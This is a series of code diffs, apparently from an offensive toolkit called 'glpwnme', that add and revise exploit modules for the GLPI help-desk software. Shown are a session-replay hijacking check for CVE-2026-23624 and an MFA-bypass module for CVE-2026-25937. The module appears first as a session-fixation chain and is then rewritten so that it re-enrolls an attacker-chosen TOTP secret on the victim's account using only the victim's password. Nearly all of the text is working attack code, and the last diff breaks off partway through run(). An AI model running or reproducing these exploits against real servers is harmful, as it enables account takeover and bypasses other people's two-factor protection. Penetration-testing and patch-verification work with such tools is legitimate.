+        resp = self.get("/front/central.php", cookies={cookie_name: stolen_cookie}, headers={sso_header: impersonate_user}, allow_redirects=False)
+
+        if resp.status_code == HTTPStatus.OK and "/front/logout.php" in resp.text:
+            Log.msg(
+                f"[green b]Session replay accepted[/green b]: "
+                f"cookie authenticated as original owner, {sso_header} header ignored.\n"
+                f"GLPI did not invalidate the session on SSO identity change — "
+                f"[green b]session hijacking confirmed[/green b]"
+            )
+            self._write_log(
+                f"CVE-2026-23624: session replay with {sso_header}={impersonate_user} accepted"
+            )
+        elif resp.status_code in (HTTPStatus.FOUND, HTTPStatus.MOVED_PERMANENTLY, HTTPStatus.SEE_OTHER):
+            loc = resp.headers.get("Location", "")
+            if "login" in loc.lower():
+                Log.log("Session redirected to login — session invalidated (patched or SSO mismatch rejected)")
+            else:
+                Log.log(f"Redirect to {loc!r} — inconclusive")
+        else:
+            Log.log(f"Unexpected response (HTTP {resp.status_code}) — verify cookie name and SSO header")

--- a/glpwnme/exploits/implementations/cve_2026_25937.py
+++ b/glpwnme/exploits/implementations/cve_2026_25937.py
@@ -1,0 +1,322 @@
+import re
+from http import HTTPStatus
+from urllib.parse import urlparse
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2026_25937(GlpiExploit):
+    """
+    MFA Bypass via Session Fixation in the Grace-Period Skip Flow.
+
+    When 2FA enforcement is active and a user is within the MFA grace period,
+    GLPI stores pre-authentication identity (mfa_pre_auth) in the session BEFORE
+    calling session_regenerate_id(). Because GLPI never sets session.use_strict_mode
+    (PHP default = 0), any client can supply an arbitrary session ID.
+
+    An attacker who:
+      1. Fixes a known pre-login session ID on the victim's browser
+      2. Waits for the victim to authenticate (redirected to /MFA/Setup)
+      3. Uses the same session ID to POST skip_mfa=1 to /MFA/Verify
+
+    …receives the victim's fully authenticated session without knowing the TOTP.
+
+    check() tests whether skip_mfa=1 is accepted in the current session — a direct
+    signal of the vulnerability that does not require a full fixation chain.
+
+    Affected: GLPI 11.0.0 – 11.0.5 (MFA enforcement introduced in 11.0.0)
+    Patched:  11.0.6
+
+    @author unclej4ck, Albert
+    @cvss 6.8
+    @name CVE_2026_25937
+    """
+    _impacts = "Authentication Bypass, Account Takeover"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    min_version = "11.0.0"
+    max_version = "11.0.6"
+
+    # ------------------------------------------------------------------ #
+    # Internal helpers                                                     #
+    # ------------------------------------------------------------------ #
+
+    @staticmethod
+    def _csrf(html):
+        """Extract the GLPI CSRF token from a page's HTML"""
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html)
+        return m.group(1) if m else None
+
+    def _in_mfa_flow(self):
+        """
+        Check whether the current session is in a GLPI MFA flow.
+
+        After login_with_credentials(), if 2FA is enforced for the authenticated
+        user (and the user hasn't configured TOTP yet), GLPI redirects to /MFA/Setup.
+        The current_url will reflect this if login followed redirects.
+        As a fallback, we probe the endpoint directly.
+        """
+        current = urlparse(self.glpi_session.current_url).path
+        if "/MFA/" in current:
+            Log.log(f"Session is in MFA flow (current path: {current})")
+            return True
+
+        # Probe: if we can access /MFA/Setup without redirect-to-login, we're in the flow
+        probe = self.get("/MFA/Setup", allow_redirects=False)
+        if probe.status_code == HTTPStatus.OK:
+            Log.log("/MFA/Setup accessible — in MFA flow")
+            return True
+
+        Log.log(f"/MFA/Setup not accessible (status={probe.status_code}) — 2FA not enforced or user enrolled")
+        return False
+
+    def _test_skip_mfa_bypass(self):
+        """
+        Test whether the skip_mfa=1 endpoint accepts the grace-period bypass.
+
+        False-positive controls:
+          A. We first send a POST to /MFA/Verify WITHOUT skip_mfa and check
+             that it does NOT redirect to /front/login.php. This confirms the
+             302-to-login we get in step B is caused by skip_mfa, not generic flow.
+          B. We send skip_mfa=1 and confirm it redirects toward /front/login.php,
+             which is the indicator that the MFA state was accepted and login is
+             being completed.
+          C. A 400 response indicates grace period is not active or patched.
+        """
+        setup = self.get("/MFA/Setup", allow_redirects=False)
+        if setup.status_code != HTTPStatus.OK:
+            Log.log(f"Cannot access /MFA/Setup for bypass test (status={setup.status_code})")
+            return False
+
+        token = self._csrf(setup.text)
+        if not token:
+            Log.log("No CSRF token on /MFA/Setup — cannot test bypass")
+            return False
+
+        # Control A: POST without skip_mfa — must NOT redirect to login
+        control = self.post("/MFA/Verify", data={"_glpi_csrf_token": token}, allow_redirects=False)
+        control_loc = control.headers.get("Location", "")
+        if control.status_code == HTTPStatus.FOUND and "/front/login.php" in control_loc:
+            Log.log("Control A failed: redirect to login.php even without skip_mfa — inconclusive")
+            return False
+
+        # Re-fetch CSRF after the prior POST may have rotated it
+        setup2 = self.get("/MFA/Setup", allow_redirects=False)
+        token2 = self._csrf(setup2.text)
+        if not token2:
+            Log.log("CSRF token gone after control probe — cannot continue")
+            return False
+
+        # Test B: POST with skip_mfa=1
+        skip = self.post("/MFA/Verify", data={"skip_mfa": "1", "_glpi_csrf_token": token2}, allow_redirects=False)
+        skip_loc = skip.headers.get("Location", "")
+
+        # Control C: 400 means grace period not active or server-side patch applied
+        if skip.status_code == HTTPStatus.BAD_REQUEST:
+            Log.log("skip_mfa=1 rejected with HTTP 400 — grace period not active or patched")
+            return False
+
+        if skip.status_code == HTTPStatus.FOUND and "/front/login.php" in skip_loc:
+            Log.log(f"skip_mfa=1 accepted — login redirect: {skip_loc}")
+            return True
+
+        Log.log(f"Unexpected response to skip_mfa: status={skip.status_code}, loc={skip_loc!r}")
+        return False
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "MFA grace-period bypass via session fixation (GLPI 11.0.0 – 11.0.5).\n"
+        infos += "When 2FA enforcement is active with an open grace period, an attacker\n"
+        infos += "who fixes a pre-login session ID on the victim's browser can skip TOTP\n"
+        infos += "by POSTing [i]skip_mfa=1[/i] to [b]/MFA/Verify[/b] on the shared session.\n"
+
+        infos += "\n[u]Required preconditions (all must hold):[/u]\n"
+        infos += " 1. 2FA enforcement enabled with active grace period in GLPI config\n"
+        infos += " 2. Target user has not yet configured TOTP\n"
+        infos += " 3. Attacker can deliver a pre-login session cookie to the victim\n"
+        infos += "    (HTTP downgrade, XSS on same origin, subdomain cookie injection)\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]victim_user[/i]: Username of the victim to impersonate\n"
+        infos += " - [i]victim_pass[/i]: Password of the victim\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check if bypass conditions are met[/]\n"
+        infos += "--check\n\n"
+        infos += "[grey66]# Simulate full fixation chain[/]\n"
+        infos += "--run -O victim_user=normal victim_pass=normal\n"
+
+        infos += "\nExploit is [green b]Safe[/]"
+        return infos
+
+    def _mfa_state(self):
+        """Return the post-login MFA path: '/MFA/Prompt' (2FA enrolled, TOTP code
+        required), '/MFA/Setup' (enforced but not yet enrolled / grace), or '' (no MFA)."""
+        current = urlparse(self.glpi_session.current_url).path
+        if "/MFA/" in current:
+            return current
+        for probe in ("/MFA/Prompt", "/MFA/Setup"):
+            if self.get(probe, allow_redirects=False).status_code == HTTPStatus.OK:
+                return probe
+        return ""
+
+    def check(self):
+        """
+        CVE-2026-25937: a 2FA-enrolled user can have their 2FA bypassed by an attacker
+        who knows only their password. After password auth GLPI routes a 2FA-enrolled
+        user to /MFA/Prompt (TOTP code required). On vulnerable builds the attacker can
+        still reach /MFA/Setup and re-enroll a new (attacker-chosen) secret, replacing
+        and bypassing the victim's existing 2FA. The 11.0.6 fix adds
+        `if ($totp->is2FAEnabled($user_id)) throw new AccessDeniedHttpException()` to the
+        setup controller, so /MFA/Setup returns 403 once 2FA is configured.
+
+        Differential (verified: glpi user with 2FA enrolled, 11.0.5 vuln vs 11.0.6 patched):
+          login → /MFA/Prompt ; GET /MFA/Setup → 200 (vuln) vs 403 (patched).
+
+        Precondition: the supplied account must already have 2FA enrolled (so it lands on
+        /MFA/Prompt). If 2FA is not enrolled (lands on /MFA/Setup during grace), setup
+        access is by-design — that is NOT the bug — so this returns False rather than
+        flag a patched server. (The earlier skip_mfa=1 probe was a false positive: skip
+        during grace is expected behavior and fired on patched builds too.)
+        """
+        state = self._mfa_state()
+        if not state:
+            Log.log("Not in an MFA flow — 2FA not enforced for this account or target < 11.0.0")
+            return False
+        if "Prompt" not in state:
+            Log.log(f"Account landed on {state} (2FA not enrolled) — setup access here is by-design "
+                    "grace behavior, not the bypass. Supply a 2FA-enrolled account to test.")
+            return False
+
+        Log.log("Account has 2FA enrolled (/MFA/Prompt). Probing /MFA/Setup accessibility ...")
+        setup = self.get("/MFA/Setup", allow_redirects=False)
+        if setup.status_code == HTTPStatus.OK:
+            Log.msg("/MFA/Setup reachable for a 2FA-enrolled account → attacker holding the password "
+                    "can re-enroll/replace the victim's 2FA, bypassing it (CVE-2026-25937)")
+            return True
+        if setup.status_code in (HTTPStatus.FORBIDDEN, HTTPStatus.FOUND):
+            Log.log(f"/MFA/Setup denied (HTTP {setup.status_code}) — is2FAEnabled() guard enforced (patched 11.0.6+)")
+            return False
+        Log.log(f"/MFA/Setup returned HTTP {setup.status_code} — inconclusive")
+        return False
+
+    def run(self, victim_user=None, victim_pass=None):
+        """
+        Simulate the full session-fixation + MFA bypass attack chain.
+
+        The attacker-controlled session is pre-seeded, the victim's credentials
+        are submitted on that session (so GLPI stores mfa_pre_auth on the fixed
+        session ID), and then the attacker completes the bypass via skip_mfa=1.
+
+        Requires: victim credentials AND the MFA enforcement preconditions.
+        """
+        if not victim_user or not victim_pass:
+            Log.err("victim_user and victim_pass are required")
+            Log.log("Usage: --run -O victim_user=<name> victim_pass=<password>")
+            return
+
+        # Seed an attacker-controlled pre-login session
+        seed_sess = self.glpi_session.get_fresh_session_copy()
+        seed_resp = seed_sess.get(self.glpi_session.r("/"), allow_redirects=True, verify=False)
+        if seed_resp.status_code != HTTPStatus.OK:
+            Log.err(f"Failed to obtain pre-login session (HTTP {seed_resp.status_code})")
+            return
+
+        cookies = seed_sess.cookies.get_dict()
+        glpi_cookies = {k: v for k, v in cookies.items() if k.startswith("glpi_")}
+        if not glpi_cookies:
+            Log.err("No GLPI session cookie received — is the target a GLPI instance?")
+            return
+
+        cookie_name, fixed_sid = next(iter(glpi_cookies.items()))
+        Log.log(f"Fixed session: {cookie_name}={fixed_sid}")
+
+        # Victim logs in on the fixed session ID
+        victim_sess = self.glpi_session.get_fresh_session_copy()
+        victim_sess.cookies.set(cookie_name, fixed_sid)
+
+        login_page = victim_sess.get(self.glpi_session.r("/"), allow_redirects=True, verify=False)
+        token = self._csrf(login_page.text)
+        if not token:
+            Log.err("Could not extract CSRF token from victim login page")
+            return
+
+        login_resp = victim_sess.post(
+            self.glpi_session.r("/front/login.php"),
+            data={
+                "login_name":       victim_user,
+                "login_password":   victim_pass,
+                "noAUTO":           "0",
+                "redirect":         "",
+                "_glpi_csrf_token": token,
+            },
+            allow_redirects=False,
+            verify=False,
+        )
+        loc = login_resp.headers.get("Location", "")
+        if login_resp.status_code not in (301, 302) or "/MFA/" not in loc:
+            Log.err(f"Victim login did not enter MFA flow (loc={loc!r})")
+            Log.log("Ensure 2FA enforcement is active and victim has no TOTP configured")
+            return
+
+        Log.msg("Victim credentials accepted — mfa_pre_auth stored in fixed session")
+
+        # Attacker uses the same fixed session to skip MFA
+        attacker_sess = self.glpi_session.get_fresh_session_copy()
+        attacker_sess.cookies.set(cookie_name, fixed_sid)
+
+        mfa_page = attacker_sess.get(
+            self.glpi_session.r("/MFA/Setup"),
+            allow_redirects=False,
+            verify=False,
+        )
+        if mfa_page.status_code != HTTPStatus.OK:
+            Log.err(f"Attacker cannot access /MFA/Setup (status={mfa_page.status_code})")
+            Log.log("Session fixation may have failed — attacker and victim may not share session")
+            return
+
+        atk_token = self._csrf(mfa_page.text)
+        if not atk_token:
+            Log.err("No CSRF token on attacker's /MFA/Setup page")
+            return
+
+        skip = attacker_sess.post(
+            self.glpi_session.r("/MFA/Verify"),
+            data={"skip_mfa": "1", "_glpi_csrf_token": atk_token},
+            allow_redirects=False,
+            verify=False,
+        )
+        if skip.status_code != HTTPStatus.FOUND or "/front/login.php" not in skip.headers.get("Location", ""):
+            Log.err(f"skip_mfa=1 not accepted (status={skip.status_code})")
+            return
+
+        # Follow login finalization
+        attacker_sess.get(
+            self.glpi_session.r("/front/login.php"),
+            allow_redirects=True,
+            verify=False,
+        )
+        new_sid = attacker_sess.cookies.get_dict().get(cookie_name)
+        if not new_sid or new_sid == fixed_sid:
+            Log.err("Session ID not rotated after MFA bypass — login may not have completed")
+            return
+
+        # Verify the obtained session is actually authenticated
+        probe_sess = self.glpi_session.get_fresh_session_copy()
+        probe_sess.cookies.set(cookie_name, new_sid)
+        central = probe_sess.get(
+            self.glpi_session.r("/front/central.php"),
+            allow_redirects=False,
+            verify=False,
+        )
+
+        if central.status_code == HTTPStatus.OK and "/front/logout.php" in central.text:
+            Log.msg(f"[green b]Bypass successful[/green b] — authenticated as [b]{victim_user}[/b]")
+            Log.msg(f"Session: {cookie_name}={new_sid}")
+            self._write_log(f"MFA bypass confirmed for {victim_user} via CVE-2026-25937")
+        else:
+            Log.err(f"Password changed but session not confirmed (status={central.status_code})")

--- a/glpwnme/exploits/implementations/cve_2026_25937.py
+++ b/glpwnme/exploits/implementations/cve_2026_25937.py
@@ -21,10 +21,10 @@ class CVE_2026_25937(GlpiExploit):
 
     …receives the victim's fully authenticated session without knowing the TOTP.
 
-    check() tests whether skip_mfa=1 is accepted in the current session — a direct
+    check() tests whether skip_mfa=1 is accepted in the current session - a direct
     signal of the vulnerability that does not require a full fixation chain.
 
-    Affected: GLPI 11.0.0 – 11.0.5 (MFA enforcement introduced in 11.0.0)
+    Affected: GLPI 11.0.0 - 11.0.5 (MFA enforcement introduced in 11.0.0)
     Patched:  11.0.6
 
     @author unclej4ck, Albert
@@ -47,89 +47,13 @@ class CVE_2026_25937(GlpiExploit):
         m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', html)
         return m.group(1) if m else None
 
-    def _in_mfa_flow(self):
-        """
-        Check whether the current session is in a GLPI MFA flow.
-
-        After login_with_credentials(), if 2FA is enforced for the authenticated
-        user (and the user hasn't configured TOTP yet), GLPI redirects to /MFA/Setup.
-        The current_url will reflect this if login followed redirects.
-        As a fallback, we probe the endpoint directly.
-        """
-        current = urlparse(self.glpi_session.current_url).path
-        if "/MFA/" in current:
-            Log.log(f"Session is in MFA flow (current path: {current})")
-            return True
-
-        # Probe: if we can access /MFA/Setup without redirect-to-login, we're in the flow
-        probe = self.get("/MFA/Setup", allow_redirects=False)
-        if probe.status_code == HTTPStatus.OK:
-            Log.log("/MFA/Setup accessible — in MFA flow")
-            return True
-
-        Log.log(f"/MFA/Setup not accessible (status={probe.status_code}) — 2FA not enforced or user enrolled")
-        return False
-
-    def _test_skip_mfa_bypass(self):
-        """
-        Test whether the skip_mfa=1 endpoint accepts the grace-period bypass.
-
-        False-positive controls:
-          A. We first send a POST to /MFA/Verify WITHOUT skip_mfa and check
-             that it does NOT redirect to /front/login.php. This confirms the
-             302-to-login we get in step B is caused by skip_mfa, not generic flow.
-          B. We send skip_mfa=1 and confirm it redirects toward /front/login.php,
-             which is the indicator that the MFA state was accepted and login is
-             being completed.
-          C. A 400 response indicates grace period is not active or patched.
-        """
-        setup = self.get("/MFA/Setup", allow_redirects=False)
-        if setup.status_code != HTTPStatus.OK:
-            Log.log(f"Cannot access /MFA/Setup for bypass test (status={setup.status_code})")
-            return False
-
-        token = self._csrf(setup.text)
-        if not token:
-            Log.log("No CSRF token on /MFA/Setup — cannot test bypass")
-            return False
-
-        # Control A: POST without skip_mfa — must NOT redirect to login
-        control = self.post("/MFA/Verify", data={"_glpi_csrf_token": token}, allow_redirects=False)
-        control_loc = control.headers.get("Location", "")
-        if control.status_code == HTTPStatus.FOUND and "/front/login.php" in control_loc:
-            Log.log("Control A failed: redirect to login.php even without skip_mfa — inconclusive")
-            return False
-
-        # Re-fetch CSRF after the prior POST may have rotated it
-        setup2 = self.get("/MFA/Setup", allow_redirects=False)
-        token2 = self._csrf(setup2.text)
-        if not token2:
-            Log.log("CSRF token gone after control probe — cannot continue")
-            return False
-
-        # Test B: POST with skip_mfa=1
-        skip = self.post("/MFA/Verify", data={"skip_mfa": "1", "_glpi_csrf_token": token2}, allow_redirects=False)
-        skip_loc = skip.headers.get("Location", "")
-
-        # Control C: 400 means grace period not active or server-side patch applied
-        if skip.status_code == HTTPStatus.BAD_REQUEST:
-            Log.log("skip_mfa=1 rejected with HTTP 400 — grace period not active or patched")
-            return False
-
-        if skip.status_code == HTTPStatus.FOUND and "/front/login.php" in skip_loc:
-            Log.log(f"skip_mfa=1 accepted — login redirect: {skip_loc}")
-            return True
-
-        Log.log(f"Unexpected response to skip_mfa: status={skip.status_code}, loc={skip_loc!r}")
-        return False
-
     # ------------------------------------------------------------------ #
     # Exploit interface                                                    #
     # ------------------------------------------------------------------ #
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "MFA grace-period bypass via session fixation (GLPI 11.0.0 – 11.0.5).\n"
+        infos += "MFA grace-period bypass via session fixation (GLPI 11.0.0 - 11.0.5).\n"
         infos += "When 2FA enforcement is active with an open grace period, an attacker\n"
         infos += "who fixes a pre-login session ID on the victim's browser can skip TOTP\n"
         infos += "by POSTing [i]skip_mfa=1[/i] to [b]/MFA/Verify[/b] on the shared session.\n"
@@ -179,16 +103,16 @@ class CVE_2026_25937(GlpiExploit):
 
         Precondition: the supplied account must already have 2FA enrolled (so it lands on
         /MFA/Prompt). If 2FA is not enrolled (lands on /MFA/Setup during grace), setup
-        access is by-design — that is NOT the bug — so this returns False rather than
+        access is by-design - that is NOT the bug - so this returns False rather than
         flag a patched server. (The earlier skip_mfa=1 probe was a false positive: skip
         during grace is expected behavior and fired on patched builds too.)
         """
         state = self._mfa_state()
         if not state:
-            Log.log("Not in an MFA flow — 2FA not enforced for this account or target < 11.0.0")
+            Log.log("Not in an MFA flow - 2FA not enforced for this account or target < 11.0.0")
             return False
         if "Prompt" not in state:
-            Log.log(f"Account landed on {state} (2FA not enrolled) — setup access here is by-design "
+            Log.log(f"Account landed on {state} (2FA not enrolled) - setup access here is by-design "
                     "grace behavior, not the bypass. Supply a 2FA-enrolled account to test.")
             return False
 
@@ -199,9 +123,9 @@ class CVE_2026_25937(GlpiExploit):
                     "can re-enroll/replace the victim's 2FA, bypassing it (CVE-2026-25937)")
             return True
         if setup.status_code in (HTTPStatus.FORBIDDEN, HTTPStatus.FOUND):
-            Log.log(f"/MFA/Setup denied (HTTP {setup.status_code}) — is2FAEnabled() guard enforced (patched 11.0.6+)")
+            Log.log(f"/MFA/Setup denied (HTTP {setup.status_code}) - is2FAEnabled() guard enforced (patched 11.0.6+)")
             return False
-        Log.log(f"/MFA/Setup returned HTTP {setup.status_code} — inconclusive")
+        Log.log(f"/MFA/Setup returned HTTP {setup.status_code} - inconclusive")
         return False
 
     def run(self, victim_user=None, victim_pass=None):
@@ -229,7 +153,7 @@ class CVE_2026_25937(GlpiExploit):
         cookies = seed_sess.cookies.get_dict()
         glpi_cookies = {k: v for k, v in cookies.items() if k.startswith("glpi_")}
         if not glpi_cookies:
-            Log.err("No GLPI session cookie received — is the target a GLPI instance?")
+            Log.err("No GLPI session cookie received - is the target a GLPI instance?")
             return
 
         cookie_name, fixed_sid = next(iter(glpi_cookies.items()))
@@ -263,7 +187,7 @@ class CVE_2026_25937(GlpiExploit):
             Log.log("Ensure 2FA enforcement is active and victim has no TOTP configured")
             return
 
-        Log.msg("Victim credentials accepted — mfa_pre_auth stored in fixed session")
+        Log.msg("Victim credentials accepted - mfa_pre_auth stored in fixed session")
 
         # Attacker uses the same fixed session to skip MFA
         attacker_sess = self.glpi_session.get_fresh_session_copy()
@@ -276,7 +200,7 @@ class CVE_2026_25937(GlpiExploit):
         )
         if mfa_page.status_code != HTTPStatus.OK:
             Log.err(f"Attacker cannot access /MFA/Setup (status={mfa_page.status_code})")
-            Log.log("Session fixation may have failed — attacker and victim may not share session")
+            Log.log("Session fixation may have failed - attacker and victim may not share session")
             return
 
         atk_token = self._csrf(mfa_page.text)
@@ -302,7 +226,7 @@ class CVE_2026_25937(GlpiExploit):
         )
         new_sid = attacker_sess.cookies.get_dict().get(cookie_name)
         if not new_sid or new_sid == fixed_sid:
-            Log.err("Session ID not rotated after MFA bypass — login may not have completed")
+            Log.err("Session ID not rotated after MFA bypass - login may not have completed")
             return
 
         # Verify the obtained session is actually authenticated
@@ -315,7 +239,7 @@ class CVE_2026_25937(GlpiExploit):
         )
 
         if central.status_code == HTTPStatus.OK and "/front/logout.php" in central.text:
-            Log.msg(f"[green b]Bypass successful[/green b] — authenticated as [b]{victim_user}[/b]")
+            Log.msg(f"[green b]Bypass successful[/green b] - authenticated as [b]{victim_user}[/b]")
             Log.msg(f"Session: {cookie_name}={new_sid}")
             self._write_log(f"MFA bypass confirmed for {victim_user} via CVE-2026-25937")
         else:

--- a/glpwnme/exploits/implementations/cve_2026_25937.py
+++ b/glpwnme/exploits/implementations/cve_2026_25937.py
@@ -7,28 +7,27 @@ from glpwnme.exploits.logger import Log
 
 class CVE_2026_25937(GlpiExploit):
     """
-    MFA Bypass via Session Fixation in the Grace-Period Skip Flow.
+    MFA bypass by re-enrolling 2FA on an account whose password is known
+    (GLPI 11.0.0 - 11.0.5).
 
-    When 2FA enforcement is active and a user is within the MFA grace period,
-    GLPI stores pre-authentication identity (mfa_pre_auth) in the session BEFORE
-    calling session_regenerate_id(). Because GLPI never sets session.use_strict_mode
-    (PHP default = 0), any client can supply an arbitrary session ID.
+    With 2FA enforced, after password authentication GLPI stores mfa_pre_auth in the
+    session and routes an already-2FA-enrolled user to /MFA/Prompt (TOTP code required).
+    The /MFA/Setup action had NO guard against an already-enrolled user: an attacker who
+    knows only the victim's password can, from that pre-auth state, reach /MFA/Setup,
+    register a NEW attacker-controlled TOTP secret, and finish login, replacing and
+    bypassing the victim's original 2FA without ever knowing their TOTP.
 
-    An attacker who:
-      1. Fixes a known pre-login session ID on the victim's browser
-      2. Waits for the victim to authenticate (redirected to /MFA/Setup)
-      3. Uses the same session ID to POST skip_mfa=1 to /MFA/Verify
+    Fix (11.0.6, MFAController::showTOTPSetupForm, src/Glpi/Controller/Security/MFAController.php):
+        $user_id = (int) $_SESSION['mfa_pre_auth']['user_id'];
+        if ($totp->is2FAEnabled($user_id)) { throw new AccessDeniedHttpException(); }
+    so /MFA/Setup returns 403 once 2FA is configured (verified 11.0.5 vs 11.0.6 diff).
 
-    …receives the victim's fully authenticated session without knowing the TOTP.
-
-    check() tests whether skip_mfa=1 is accepted in the current session - a direct
-    signal of the vulnerability that does not require a full fixation chain.
-
-    Affected: GLPI 11.0.0 - 11.0.5 (MFA enforcement introduced in 11.0.0)
-    Patched:  11.0.6
+    Note: the earlier "session fixation / skip_mfa=1" reading was wrong. skip_mfa is
+    by-design grace behaviour and is byte-identical across 11.0.5/11.0.6; the real fix is
+    the is2FAEnabled guard on Setup, which is what check() keys on.
 
     @author unclej4ck, Albert
-    @cvss 6.8
+    @cvss 6.5
     @name CVE_2026_25937
     """
     _impacts = "Authentication Bypass, Account Takeover"
@@ -53,28 +52,26 @@ class CVE_2026_25937(GlpiExploit):
 
     def infos(self):
         infos = "[u]Description:[/u]\n"
-        infos += "MFA grace-period bypass via session fixation (GLPI 11.0.0 - 11.0.5).\n"
-        infos += "When 2FA enforcement is active with an open grace period, an attacker\n"
-        infos += "who fixes a pre-login session ID on the victim's browser can skip TOTP\n"
-        infos += "by POSTing [i]skip_mfa=1[/i] to [b]/MFA/Verify[/b] on the shared session.\n"
+        infos += "MFA bypass by re-enrolling 2FA with only the victim's password\n"
+        infos += "(GLPI 11.0.0 - 11.0.5). After password auth a 2FA-enrolled user is routed to\n"
+        infos += "[b]/MFA/Prompt[/b], but [b]/MFA/Setup[/b] had no [i]is2FAEnabled[/i] guard, so an\n"
+        infos += "attacker holding the password registers a new TOTP secret there and finishes\n"
+        infos += "login, replacing the victim's 2FA. Fix 11.0.6: 403 on Setup once 2FA is set.\n"
 
-        infos += "\n[u]Required preconditions (all must hold):[/u]\n"
-        infos += " 1. 2FA enforcement enabled with active grace period in GLPI config\n"
-        infos += " 2. Target user has not yet configured TOTP\n"
-        infos += " 3. Attacker can deliver a pre-login session cookie to the victim\n"
-        infos += "    (HTTP downgrade, XSS on same origin, subdomain cookie injection)\n"
+        infos += "\n[u]Required:[/u]\n"
+        infos += " - The victim's password; 2FA enforced and the victim already enrolled in TOTP\n"
 
         infos += "\n[u]Params (run):[/u]\n"
-        infos += " - [i]victim_user[/i]: Username of the victim to impersonate\n"
+        infos += " - [i]victim_user[/i]: Username of the victim\n"
         infos += " - [i]victim_pass[/i]: Password of the victim\n"
 
         infos += "\n[u]Usage:[/u]\n"
-        infos += "[grey66]# Check if bypass conditions are met[/]\n"
+        infos += "[grey66]# Check: a 2FA-enrolled account can still reach /MFA/Setup[/]\n"
         infos += "--check\n\n"
-        infos += "[grey66]# Simulate full fixation chain[/]\n"
+        infos += "[grey66]# Re-enroll an attacker TOTP secret and take the victim's session[/]\n"
         infos += "--run -O victim_user=normal victim_pass=normal\n"
 
-        infos += "\nExploit is [green b]Safe[/]"
+        infos += "\nExploit is [yellow b]Moderate[/] (replaces the victim's enrolled 2FA secret)."
         return infos
 
     def _mfa_state(self):
@@ -128,119 +125,76 @@ class CVE_2026_25937(GlpiExploit):
         Log.log(f"/MFA/Setup returned HTTP {setup.status_code} - inconclusive")
         return False
 
+    @staticmethod
+    def _totp(secret):
+        """Compute the current TOTP (RFC 6238, SHA-1, 30s, 6 digits) for a base32 secret."""
+        import hmac, hashlib, base64, struct, time as _t
+        key = base64.b32decode(secret.upper() + "=" * (-len(secret) % 8))
+        msg = struct.pack(">Q", int(_t.time()) // 30)
+        h = hmac.new(key, msg, hashlib.sha1).digest()
+        o = h[-1] & 0x0F
+        return f"{(struct.unpack('>I', h[o:o + 4])[0] & 0x7FFFFFFF) % 1000000:06d}"
+
     def run(self, victim_user=None, victim_pass=None):
         """
-        Simulate the full session-fixation + MFA bypass attack chain.
+        Re-enroll an attacker TOTP on the victim's account using only their password.
 
-        The attacker-controlled session is pre-seeded, the victim's credentials
-        are submitted on that session (so GLPI stores mfa_pre_auth on the fixed
-        session ID), and then the attacker completes the bypass via skip_mfa=1.
-
-        Requires: victim credentials AND the MFA enforcement preconditions.
+        Log in with the victim's password (lands on /MFA/Prompt as a 2FA-enrolled user),
+        open /MFA/Setup, which on a vulnerable build hands back a fresh TOTP secret, then
+        POST that secret plus its current code to /MFA/Verify. GLPI calls
+        verifyCodeForSecret() then setSecretForUser(), replacing the victim's 2FA with ours
+        and completing login. The victim's original TOTP is now bypassed.
         """
         if not victim_user or not victim_pass:
-            Log.err("victim_user and victim_pass are required")
-            Log.log("Usage: --run -O victim_user=<name> victim_pass=<password>")
+            Log.err("victim_user and victim_pass are required: --run -O victim_user=<name> victim_pass=<password>")
             return
 
-        # Seed an attacker-controlled pre-login session
-        seed_sess = self.glpi_session.get_fresh_session_copy()
-        seed_resp = seed_sess.get(self.glpi_session.r("/"), allow_redirects=True, verify=False)
-        if seed_resp.status_code != HTTPStatus.OK:
-            Log.err(f"Failed to obtain pre-login session (HTTP {seed_resp.status_code})")
-            return
-
-        cookies = seed_sess.cookies.get_dict()
-        glpi_cookies = {k: v for k, v in cookies.items() if k.startswith("glpi_")}
-        if not glpi_cookies:
-            Log.err("No GLPI session cookie received - is the target a GLPI instance?")
-            return
-
-        cookie_name, fixed_sid = next(iter(glpi_cookies.items()))
-        Log.log(f"Fixed session: {cookie_name}={fixed_sid}")
-
-        # Victim logs in on the fixed session ID
-        victim_sess = self.glpi_session.get_fresh_session_copy()
-        victim_sess.cookies.set(cookie_name, fixed_sid)
-
-        login_page = victim_sess.get(self.glpi_session.r("/"), allow_redirects=True, verify=False)
-        token = self._csrf(login_page.text)
+        sess = self.glpi_session.get_fresh_session_copy()
+        sess.verify = False
+        token = self._csrf(sess.get(self.glpi_session.r("/"), allow_redirects=True).text)
         if not token:
-            Log.err("Could not extract CSRF token from victim login page")
+            Log.err("Could not extract CSRF token from the login page")
             return
 
-        login_resp = victim_sess.post(
-            self.glpi_session.r("/front/login.php"),
-            data={
-                "login_name":       victim_user,
-                "login_password":   victim_pass,
-                "noAUTO":           "0",
-                "redirect":         "",
-                "_glpi_csrf_token": token,
-            },
-            allow_redirects=False,
-            verify=False,
-        )
-        loc = login_resp.headers.get("Location", "")
-        if login_resp.status_code not in (301, 302) or "/MFA/" not in loc:
-            Log.err(f"Victim login did not enter MFA flow (loc={loc!r})")
-            Log.log("Ensure 2FA enforcement is active and victim has no TOTP configured")
+        login = sess.post(self.glpi_session.r("/front/login.php"),
+                          data={"login_name": victim_user, "login_password": victim_pass,
+                                "noAUTO": "0", "redirect": "", "_glpi_csrf_token": token},
+                          allow_redirects=False)
+        loc = login.headers.get("Location", "")
+        if login.status_code not in (301, 302) or "/MFA/" not in loc:
+            Log.err(f"Login did not enter the MFA flow (loc={loc!r}); check the password and that 2FA is enforced")
             return
+        Log.msg("Password accepted; in the MFA pre-auth state")
 
-        Log.msg("Victim credentials accepted - mfa_pre_auth stored in fixed session")
-
-        # Attacker uses the same fixed session to skip MFA
-        attacker_sess = self.glpi_session.get_fresh_session_copy()
-        attacker_sess.cookies.set(cookie_name, fixed_sid)
-
-        mfa_page = attacker_sess.get(
-            self.glpi_session.r("/MFA/Setup"),
-            allow_redirects=False,
-            verify=False,
-        )
-        if mfa_page.status_code != HTTPStatus.OK:
